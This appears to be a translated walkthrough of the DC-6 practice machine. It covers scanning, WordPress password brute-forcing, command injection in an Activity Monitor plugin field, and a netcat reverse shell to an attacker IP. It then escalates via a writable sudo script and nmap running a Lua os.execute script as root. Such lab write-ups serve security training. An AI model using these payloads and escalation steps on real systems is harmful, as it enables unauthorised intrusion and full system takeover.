1. Set up the environment
kali acts as an attack machine. The IP address is: 192.168.200.14
DC-6 acts as a target drone: IP address is temporarily unknown
Note: Let both machines use the same network adapter
2. Information collection
1. Explore the surviving hosts on the same network segment,
①The first method
arp-scan -l
②The second method
netdiscover -i eth0 -r 192.168.200.0/24
③The third method
nmap -sP 192.168.200.0/24 -T4
2. Open port information
nmap -sS -A 192.168.200.7 -p 1-65535
Port 80 and port 22 are open, log in to the web page
It should be redirected. Find the hosts file in kali and write the relationship of 192.168.200.7 wordy into it.
After refreshing the web page, I saw that the web page uses wordpress cms +
The CMS system of this drone is wordpress5.1.1
According to CMS version ideas:
First: Use directory scanning tools to find the back-end management system of the CMS, then crack the password and account number to enter the back-end management system to find exploitable points.
Use kali tool dirb to discover the backend directory
dirb http://192.168.200.7/
Backend interface
3. Backstage blasting
Continue to crack the account password, use wpscan, the account cracking tool for the CMS, to guess the password:
wpscan --url http://wordy -e u #Specify the url and enumerate the user names in it
Save the above username in a new file, user.txt
cewl generates passwords based on this article, and then uses blasting tools to brute force crack them
Prompt message
Prompt to use the dictionary rockyou.txt that comes with kali to export the dictionary containing the password of k01 (unzip it first if you have not decompressed it, I have decompressed it before)
cat /usr/share/wordlists/rockyou.txt | grep k01 > pwd.txt
I have my account and password and started blasting
wpscan --url wordy -U user.txt -P pwd.txt
Account:**mark **
Password:helpdesk01
Second: Search for vulnerabilities in this version on the Internet, or use searchsploit, msfconsole and other tools to find vulnerabilities and exploitation methods.
Log in to the background
3. Vulnerability detection
Two clues were found here,
First: This website uses the activity monitor tool.
Second, there are injection points in the tools column of the activity monitor directory.
Based on these two clues, this article has two ideas:
First: Since the user’s input will be returned to the background for analysis, can we modify the data package to achieve our purpose? You can use BP packet capture test.
Second: Use the vulnerability scanning tool mentioned above to scan the activity monitor and look for historical vulnerabilities.
Using the first idea, enter qquhu.com and click lookup
BURP packet capture test found that whoami behind the pipe character was running. Explain that there is a vulnerability here. .
Rebound shell
Use this vulnerability to bounce a shell.
First enable monitoring on the kali virtual machine
nc -lvvp 6666
Change the package to qq.com | nc -e /bin/bash 192.168.200.14 6666 # kali’s IP address
execution succeed
Use python to enable interactive mode. input the command
python -c 'import pty;pty.spawn("/bin/bash")'
Open the home directory and look for new clues:
There is a things-to-do file in the mark directory, and Graham’s account password was found.
Then I logged in with Graham’s account and password, but the login failed. The drone also opened port 22, so I tried to log in via SSH.
ssh [email protected]
Elevation of privilege
sudo -l #Try sudo -l j password-free login User graham may run the following commands on dc-6: (jens) NOPASSWD: /home/jens/backups.sh # Check the permissions the current user has and can perform write operations on backups.sh cd /home/jens #Write to /bin/bash, execute, switch to jens’ shell echo "/bin/bash" >> backups.sh sudo -u jens ./backups.sh # Found that nmap can be executed with root privileges sudo -l User jens may run the following commands on dc-6: (root) NOPASSWD: /usr/bin/nmap #It is found that nmap can be executed with root privileges. In earlier versions, nmap can be used to escalate privileges. To escalate privileges, use os.execute("/bin/sh") Write to a file. echo "os.execute('/bin/bash')" > getshell sudo nmap --script=getshell
Enter the /home/jens directory and open the backups.sh file. There is a compressed command line inside, indicating that the file can be run.
You can add the /bin/bash statement to the file, and you can open the jens shell.
echo '/bin/bash' >> backups.sh #Add command line to the file sudo ./backups.sh #Failed to run because the user is graham at this time sudo -u jens ./backups.sh #-u specifies the user
jens can run nmap with root permissions without password, and nmap can run files.
nmap privilege escalation: Use nmap to execute this script with root permissions, open the root shell file, and then let nmap execute it
echo "os.execute('/bin/bash')" > getshell sudo nmap --script=getshell
Flag found in root directory